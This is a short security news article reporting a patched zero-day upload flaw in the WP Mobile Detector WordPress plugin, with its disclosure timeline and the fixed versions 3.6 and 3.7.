WordPress Plugin Zero-Day Flaw Affects Over 10,000 Websites Vulnerable to Exploit

WordPress Plugin Zero-Day Flaw Affects Over 10,000 Websites Vulnerable to Exploit

This Simple drag-and-drop feature in Windows explorer can save your time
Free Ransomware Decryptors To Unlock Your Encrypted Files Without Paying A Penny To Scammers
C Programming Examples Every Beginner Must Know

WordPress most widely used Content Management System (CMS) mostly compromises because of the flaws in its plugins. Recently a WordPress plugin zero-day flaw has been detected, which already affected over 10,000 websites vulnerable to exploit.

Also Read : 86% Of Critical Vulnerabilities Affecting Windows Could Be Avoided By Removing Admin Rights

Zero-Day Flaw in WordPress Plugin


Security researchers found a zero-day flaw in the WordPress plugin, WP Mobile Detector – a WordPress plugin that automatically detects standard and advanced mobile devices and displays a compatible WordPress mobile theme.

The zero-day flaw was first disclosed by the Plugin Vulnerabilities team on May 31 and doubted that over 10,000 websites may have affected with the flaw and vulnerable to exploit.

The security researchers became aware of a potential problem after receiving a HEAD request for a WP Mobile Detector file, blog/wp-content/plugins/wp-mobile-detector/resize.php, on a CMS domain which did not have the software installed.

The team investigated further and realized it was most likely that “someone was checking for the existence of the file before trying to exploit a vulnerability in the plugin.”

According to Sucuri, “the vulnerability is very easy to exploit, all the attacker needs to do is send a request to resize.php or timthumb.php, inside the plugin directory with the backdoor URL.”

The team behind WP Mobile Detector were informed of the zero-day flaw on 29 May and the wordpress.org Plugin Directory was notified two days later, leading to the temporary removal of the plugin.

On 31 May, the developers of the plugin patched the issue and the plugin has been restored. Users should update to either version 3.6 or 3.7, both of which are now no longer vulnerable to attacks exploiting the vulnerability.

Also Read : Researchers from Google Discovered How to Hack a Corporate Network just by Sending an Email

COMMENTS

WORDPRESS: 0